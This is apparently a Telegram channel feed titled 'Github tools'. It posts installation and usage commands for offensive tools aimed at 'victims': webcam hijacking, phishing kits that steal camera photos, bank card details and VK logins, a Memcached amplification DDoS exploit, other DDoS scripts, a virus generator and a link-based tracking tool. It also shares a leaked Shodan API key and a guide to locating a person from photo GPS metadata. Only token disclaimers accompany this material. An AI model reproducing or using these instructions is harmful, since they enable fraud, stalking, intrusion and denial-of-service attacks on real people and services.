Github tools
2.74K subscribers
33 photos
2 videos
58 files
366 links
Github useful scripts and tools
Download Telegram
How to determine the location of a person from a photograph

Good evening friends. As you know, many interesting things are stored in the metadata: camera type, phone model, name, photo changes, but the most interesting thing is the shooting location. Now I will show you another interesting way of punching a person from a photo. We need Termux.

1. Download the required packages
$ apt update && apt upgrade -y && pkg install exiftool -y
2. Give Termux permission to view the device memory
$ termux-setup-storage
3. We look at the metadata of the photo with which we are in the same directory
$ exiftool filename.jpg

Next, we look for the GPS Position item, where we change "deg" to "°". Next, go to Google Maps and insert the obtained coordinates into the search. As a result, you will get the exact location where the photo was taken.
How hackers can hack webcams with Termux

Friends, today you will learn how hackers using a special program can get access to CCTV cameras.

Installation:

$ apt install python3
$ apt install git
$ git clone https://github.com/yan4ikyt/webhack
$ cd webhack
$ bash install.sh

Usage

$ python WebHack.py

After entering this command, select the country and the utility will give us IP cameras. Now you can paste the received IPs into the browser and view
Hacking cameras via Termux

CCTV - a comprehensive utility for hacking webcams

Installation:

▪️git clone https://github.com/Err0r-ICA/CCTV.git
▪️cd CCTV
▪️python2 CCTV

After that, you will need to select a region, and the program will issue addresses and passwords.
Hacking a webcam using a phishing attack

It is worth noting in advance that we have already published similar tools. However, this utility has a wide variety of settings for phishing links, port forwarding and bypassing Google.

Seeu is a bash-based script for hacking device cameras using portforwarding and google bypass functions.

Installation

$ apt-get update -y
$ apt-get upgrade -y
$ termux-setup-storage
$ pkg install curl -y
$ pkg install wget -y
$ pkg install git -y
$ pkg install php -y
$ git clone https://github.com/noob-hackers/seeu
$ cd see

launch

$ bash seeu.sh

We will open a menu, press the number 1 and proceed to setting up a phishing page. Next, select the type of phishing link, generate it and run it. We throw off the link to the victim and after she clicks on it, we will receive her photo in the folder with the script.
​Memcrashed - the most powerful DDoS

Memcrashed is a tool that allows you to use Shodan.io to get hundreds of vulnerable Memcached servers.

The default payload includes the memcached "stats" command, 10 bytes to send, but the response is between 1500 bytes and hundreds of kilobytes. The consequences and power are amazing - on February 28, 2018, a 1.35 TB/s attack occurred on GitHub.com.

Installation:

• git clone https://github.com/649/Memcrashed-DDoS-Exploit.git
• pip install shodan
• pip install scapy
• pip install -r requirements.txt
• cd /Memcrashed-DDoS-Exploit

Usage:

• python3 Memcrashed.py

Memcrashed asks for a valid ApiKey. You can try to search it on GitHub by: api key & ApiKey & ApiKey Shodan.

But there is also a small gift for you, the working key "PSKINdQe1GyxGgecYz2191H2JoS9qvgD"
DDos attack via Termux

DDoS attacks (Distributed Denial of Service - distributed denial of service attacks) are attacks on computer systems (network resources or communication channels) aimed at making them inaccessible to legitimate users.

Installation:

▪️apt update & apt upgrade -y && pkg install python git -y
▪️git clone https://github.com/HardyTomas/DDos-Attack-OVH-
▪️cd DDos-Attack-OVH-
▪️pip install toripchanger
▪️pip install -r requirements.txt

Usage:

▪️python80port.py

Also, you can attack on port 443 (https)

▪️python443port.py
Finding website vulnerabilities

XAttacker - created for the lazy and inquisitive, with it you can not only find out what engine the site is on, but also find out its vulnerabilities, as well as get links to these vulnerabilities.

Installation

$ apt install git
$ git clone https://github.com/Moham3dRiahi/XAttacker.git
$ cd
$ chmod +x termux-install.sh
$ bash termux-install.sh

Usage

$ perl XAttacker.pl - launch;
$ perl XAttacker.pl -l list.txt - if there is a list of websites;
$ perl XAttacker.pl -multi - enable multithreading;
Follow the victim with a link

Trape is an OSINT tool that allows you to monitor and execute social engineering attacks in real time.

The utility creates a phishing link that allows you to follow the user who clicks on it. Thanks to this tool, you can get information such as: IP, geolocation, OS. You can also run js scripts remotely, upload files to a PC. It will be possible to find out on which services the user is registered.

Installation

$ apt update -y
$ apt upgrade -y
$ apt install python
$ apt install git
$ git clone https://github.com/jofpin/trape.git

launch

$ cd tape
$ pip3 install -r requirements.txt
$ python3 trape.py --url <link to any page> --port 8080

Usage

$ python3 trape.py --url http://example.com --port 8080
​Install 340 useful utilities with one click

Sashay is a script that gives you the ability to automatically install 340 basic Linux tools with which you can upgrade your "skills".

Categories:
- DDOS attacks
- Brute force attacks
- Scan websites for vulnerabilities
- OSINT tools
- Sniffing
- and a couple of other useful programs.

Installation:
• git clone https://github.com/viewerdiscretion/sashay.git
• cd sashay
• chmod +x install

Launch:
• sh install

To run at any time use the sshy command
Hacking a webcam using a phishing attack

It is worth noting in advance that we have already published similar tools. However, this utility has a wide variety of settings for phishing links, port forwarding and bypassing Google.

Seeu is a bash-based script for hacking device cameras using portforwarding and google bypass functions.

Installation

$ apt-get update -y
$ apt-get upgrade -y
$ termux-setup-storage
$ pkg install curl -y
$ pkg install wget -y
$ pkg install git -y
$ pkg install php -y
$ git clone https://github.com/noob-hackers/seeu
$ cd see

launch

$ bash seeu.sh

We will open a menu, press the number 1 and proceed to setting up a phishing page. Next, select the type of phishing link, generate it and run it. We throw off the link to the victim and after she clicks on it, we will receive her photo in the folder with the script.
Script for sms attacks

MySMS v1.0 is a script that generates an Android application with the functionality of SMS attacks over WAN. For Kali Linux users.
https://github.com/papusingh2sms/mysms
🔰 EXCLUSIVE Spotify Auto Upgrader 🔰

https://github.com/sickaesir/auto-spotify-upgrader
https://www.mediafire.com/file/mztgfmm7i190k2u/AutoSpotifyUpgrader.zip/file

With this program you can multiply your premium accounts if you have family owner spotify accounts.

Just feed in the free account list, the family owner account list and let the magic happen.

It features:
- Automatic country change

- Builtin checker

- Automatic invite code grabbing & applying

- And more i can't remember cause ffs was so long ago

I've spent a fair amount of hours on this to keep it ez & clean.
We create a virus for Android/Windows/Linux

Hello everyone.
Well Z Virus is a collection of ready made viruses. This software is capable of generating viruses for all operating systems, and all you need to do is send a link to your victim and force them to download the virus.

Installation:
▪️git clone https://github.com/ZechBron/zVirus-Gen.git
▪️cd zVirus-Gen
chmod +x setup.sh
▪️./setup.sh

Usage:
▪️bash zVirus - program launch

All information is provided for informational purposes only. We are not responsible for your actions.
Phishing CC

Hello everyone.
Cardesc is a debit/credit card phishing tool. The principle of operation is simple - with the help of social engineering, we convince the victim to go through the page and enter his card details.

Installation:
▪️apt install python3 git
▪️git clone https://github.com/escdroid/cardesc.git
▪️cd cardesc
▪️chmod +x *
▪️pip3 install -r requirements.txt

Usage:
▪️python3 bank.py - run utility
FOR INFORMATION PURPOSES ONLY!

All information is provided for informational purposes only. We are not responsible for your actions.
👍1
Encrypting text into an image

ImSter is a utility that allows you to securely hide and view password-encrypted text inside an image. Text is encoded in image pixels, not metadata. It is impossible to determine by eye whether there is hidden content in the image.

Installation

Install the latest release: https://github.com/armytricks/ImSter/releases/tag/v1.1.2
$ chmod +x ImSter-*.jar

Usage

$ java -jar ImSter-xxx.jar encode -i input.png -o output.png -m "message" -p password

You can read more about using the utility on the official GitHub page of the repository.
1
Convenient phishing Vkontakte

Fisher is a weeman script adapted for copying VK pages.

Installation

$ apt update && apt upgrade
$ apt install python2
$ apt install git
$ git clone https://github.com/foxlitegor/fisher
$ cd fisher
$ chmod 777 install.sh
$ sh install.sh
$fish
$ run

Usage

Create a second session in Termux (swipe from left to right) and write:

$ apt install openssh
$ ssh -R 80:localhost:8080 ssh.localhost.ru

After that, we will generate a phishing link, send it to our “victim” and enjoy the result
All-in-One Hacking Toolkit

VARIOUS is a universal utility with all kinds of hacking scripts.

Installation

$ git clone https://github.com/Err0r-ICA/VARIOUS.git
$ cd VARIOUS

launch

$ python3 Various
Next, enter the password: ICA